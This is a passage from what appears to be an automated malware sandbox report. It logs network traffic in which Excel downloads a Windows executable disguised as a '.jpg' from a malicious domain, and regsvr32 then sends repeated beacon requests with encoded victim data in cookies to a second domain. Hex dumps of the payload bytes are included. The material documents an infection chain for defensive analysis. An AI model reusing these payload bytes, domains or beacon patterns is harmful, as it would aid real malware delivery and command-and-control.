                                                                                                                                                                                                                Jul 6, 2021 15:17:29.614043951 CEST74INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                                Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.614067078 CEST75INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                                Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.614084005 CEST77INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                                Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.614660978 CEST78INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                                Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                2192.168.2.2249169104.21.55.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.772820950 CEST126OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                Host: uppercilio.fun
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855700016 CEST127INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 13:17:29 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 57856
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                Age: 4877
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=iX9yblW0mmu%2BBPHi%2FzXvtGYEd5r%2FSHAy585QhglT14%2BlgJho6MNNRiF2H%2FkAJPMuKASib%2BW6D8mZAm7vxYQ3HFTsYtjND%2Besj0W8NQ1pDcKeJGGEMQ67oP2hbp8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 66a91d154ea32c2a-FRA
                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855736971 CEST128INData Raw: 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: @@
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855750084 CEST130INData Raw: dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54
                                                                                                                                                                                                                Data Ascii: $#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HH
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855762959 CEST131INData Raw: 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7
                                                                                                                                                                                                                Data Ascii: H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855775118 CEST132INData Raw: 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8
                                                                                                                                                                                                                Data Ascii: $D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855787992 CEST134INData Raw: 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b
                                                                                                                                                                                                                Data Ascii: $pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855804920 CEST135INData Raw: a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b
                                                                                                                                                                                                                Data Ascii: L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHL
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855822086 CEST136INData Raw: 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24
                                                                                                                                                                                                                Data Ascii: `$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855838060 CEST138INData Raw: 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b
                                                                                                                                                                                                                Data Ascii: D$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.855858088 CEST139INData Raw: c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24
                                                                                                                                                                                                                Data Ascii: DDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+H
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.856621027 CEST141INData Raw: 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00
                                                                                                                                                                                                                Data Ascii: $H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                3192.168.2.2249171104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                Jul 6, 2021 15:17:32.084861040 CEST446OUTGET / HTTP/1.1
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Cookie: __gads=3565085024:1:5681:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:42443446333133363232433331384537; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                Host: astrocycle.download
                                                                                                                                                                                                                Jul 6, 2021 15:17:32.716932058 CEST447INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 13:17:32 GMT
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2MV8QitoddGiqss38WJx5%2B9Wu21O9R3oblVcjmnoYS6hvtwuO3Ylf9xWJt5pGmKgQ9nMTT5PXIBp61pfoR72DvSfwcCx4%2FdLJOIM%2BsubmRh4CA5TateDl6nBJUbpkYJNYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 66a91d23bcedc2c7-FRA
                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                Jul 6, 2021 15:17:32.716986895 CEST447INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                4192.168.2.2249173104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.767546892 CEST706OUTGET / HTTP/1.1
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Cookie: __gads=3565085024:1:5686:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=323130393739:416C627573:42414646354341413330314338363736; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                Host: astrocycle.download
                                                                                                                                                                                                                Jul 6, 2021 15:17:37.304222107 CEST707INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 13:17:37 GMT
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gKUg37FY1zGxixB8Pryb639Mc9VGh%2BsqEvF79Y0tGFev2OkvcjksAkPJSgvZ2SKtCtL9zXRwTWKvbb5eLg5KV6M5gLFHMS0arDCCBDgEc%2FyQv%2FaoO7ONWzQKHIW0MX%2BTcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 66a91d40fd4c4a62-FRA
                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                Jul 6, 2021 15:17:37.304249048 CEST707INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                5192.168.2.2249175104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.763216972 CEST966OUTGET / HTTP/1.1
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Cookie: __gads=3565085024:1:5689:52; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:45324139433039303530354537464245; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                Host: astrocycle.download
                                                                                                                                                                                                                Jul 6, 2021 15:17:40.299678087 CEST967INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 13:17:40 GMT
                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Rq5GTI7qi1B0ciDlWvDkTaKmop5747oTddfhWbbP1bLa%2FuaOUSwvYu%2F6EE2bhB%2B%2FPO6wtOyWbUr3awdVQ5QtSYsGucv1osULaU1RU%2FrrVVflK34vRZtrsLDFVtVFaYvfNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                CF-RAY: 66a91d53b9984e97-FRA
                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                Jul 6, 2021 15:17:40.299702883 CEST967INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                HTTPS Packets

                                                                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.684426069 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.362288952 CEST13.224.92.73443192.168.2.2249172CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
